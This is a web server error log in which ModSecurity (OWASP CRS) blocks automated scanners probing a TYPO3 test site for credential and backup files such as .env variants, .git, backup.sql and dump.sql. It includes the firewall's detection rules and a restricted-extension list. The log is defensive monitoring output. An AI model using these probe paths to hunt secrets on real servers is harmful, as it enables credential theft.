[Fri Mar 20 15:01:18.992899 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_config"] [unique_id "ab1TLpJiwBXnNifSr5vesAAAAAQ"]
[Fri Mar 20 15:01:18.993029 2026] [:error] [pid 2815713] [client 162.158.86.142:13502] [client 162.158.86.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_config"] [unique_id "ab1TLpJiwBXnNifSr5vesAAAAAQ"]
[Fri Mar 20 15:01:18.994092 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_secret"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_secret"] [unique_id "ab1TLmLvrbuE12wYiLe4NwAAABA"]
[Fri Mar 20 15:01:18.994184 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_secret"] [unique_id "ab1TLmLvrbuE12wYiLe4NwAAABA"]
[Fri Mar 20 15:01:18.994311 2026] [:error] [pid 2822566] [client 162.158.86.254:13007] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_secret"] [unique_id "ab1TLmLvrbuE12wYiLe4NwAAABA"]
[Fri Mar 20 15:01:18.995831 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_settings"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_settings"] [unique_id "ab1TLv9i5ZHhQgdGB68gJQAAAAg"]
[Fri Mar 20 15:01:18.995962 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_settings"] [unique_id "ab1TLv9i5ZHhQgdGB68gJQAAAAg"]
[Fri Mar 20 15:01:18.996099 2026] [:error] [pid 2817639] [client 162.158.86.143:11595] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_settings"] [unique_id "ab1TLv9i5ZHhQgdGB68gJQAAAAg"]
[Fri Mar 20 15:01:19.007260 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "ab1TL0nH70iMTzyPh3kWlgAAAAY"]
[Fri Mar 20 15:01:19.007417 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "ab1TL0nH70iMTzyPh3kWlgAAAAY"]
[Fri Mar 20 15:01:19.007536 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "ab1TL0nH70iMTzyPh3kWlgAAAAY"]
[Fri Mar 20 15:01:19.007672 2026] [:error] [pid 2816018] [client 162.158.86.254:13006] [client 162.158.86.254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local.backup"] [unique_id "ab1TL0nH70iMTzyPh3kWlgAAAAY"]
[Fri Mar 20 15:01:19.763133 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "ab1TL0Gu3yPOFBRkxZtwywAAAAA"]
[Fri Mar 20 15:01:19.763273 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "ab1TL0Gu3yPOFBRkxZtwywAAAAA"]
[Fri Mar 20 15:01:19.763416 2026] [:error] [pid 2815709] [client 162.158.86.143:11588] [client 162.158.86.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "ab1TL0Gu3yPOFBRkxZtwywAAAAA"]
[Fri Mar 20 22:13:45.104241 2026] [authz_core:error] [pid 2815711] [client 45.130.203.179:46017] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Mar 21 00:47:18.499414 2026] [:error] [pid 2834409] [client 2.57.122.173:44520] [client 2.57.122.173] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab3chtHYYAKUy9Wv_UftnwAAABI"]
[Sat Mar 21 00:47:18.499618 2026] [:error] [pid 2834409] [client 2.57.122.173:44520] [client 2.57.122.173] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab3chtHYYAKUy9Wv_UftnwAAABI"]
[Sat Mar 21 00:47:18.499753 2026] [:error] [pid 2834409] [client 2.57.122.173:44520] [client 2.57.122.173] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab3chtHYYAKUy9Wv_UftnwAAABI"]
[Sat Mar 21 04:07:43.929702 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Mar 21 04:07:44.225230 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab4LgLVOPlV6sIlrZCplFwAAAAA"]
[Sat Mar 21 04:07:44.225433 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab4LgLVOPlV6sIlrZCplFwAAAAA"]
[Sat Mar 21 04:07:44.225584 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "ab4LgLVOPlV6sIlrZCplFwAAAAA"]
[Sat Mar 21 04:07:44.831081 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backup.sql
[Sat Mar 21 04:07:45.125435 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/debug.log
[Sat Mar 21 04:07:45.419705 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/database.sql
[Sat Mar 21 04:07:45.844768 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Sat Mar 21 04:07:47.596072 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/dump.sql
[Sat Mar 21 04:07:48.213411 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ab4LhLVOPlV6sIlrZCplIwAAAAA"]
[Sat Mar 21 04:07:48.213569 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ab4LhLVOPlV6sIlrZCplIwAAAAA"]
[Sat Mar 21 04:07:48.213747 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "ab4LhLVOPlV6sIlrZCplIwAAAAA"]
[Sat Mar 21 04:07:48.507615 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/log
[Sat Mar 21 04:07:48.803879 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "ab4LhLVOPlV6sIlrZCplJQAAAAA"]
[Sat Mar 21 04:07:48.804039 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "ab4LhLVOPlV6sIlrZCplJQAAAAA"]
[Sat Mar 21 04:07:48.804200 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "ab4LhLVOPlV6sIlrZCplJQAAAAA"]
[Sat Mar 21 04:07:50.548068 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ab4LhrVOPlV6sIlrZCplKQAAAAA"]
[Sat Mar 21 04:07:50.548292 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ab4LhrVOPlV6sIlrZCplKQAAAAA"]
[Sat Mar 21 04:07:50.548467 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "ab4LhrVOPlV6sIlrZCplKQAAAAA"]
[Sat Mar 21 04:07:51.157207 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ab4Lh7VOPlV6sIlrZCplKwAAAAA"]
[Sat Mar 21 04:07:51.157374 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ab4Lh7VOPlV6sIlrZCplKwAAAAA"]
[Sat Mar 21 04:07:51.157529 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "ab4Lh7VOPlV6sIlrZCplKwAAAAA"]
[Sat Mar 21 04:07:51.454306 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "ab4Lh7VOPlV6sIlrZCplLAAAAAA"]
[Sat Mar 21 04:07:51.454516 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "ab4Lh7VOPlV6sIlrZCplLAAAAAA"]
[Sat Mar 21 04:07:51.454689 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "ab4Lh7VOPlV6sIlrZCplLAAAAAA"]
[Sat Mar 21 04:07:51.766393 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "ab4Lh7VOPlV6sIlrZCplLQAAAAA"]
[Sat Mar 21 04:07:51.766555 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "ab4Lh7VOPlV6sIlrZCplLQAAAAA"]
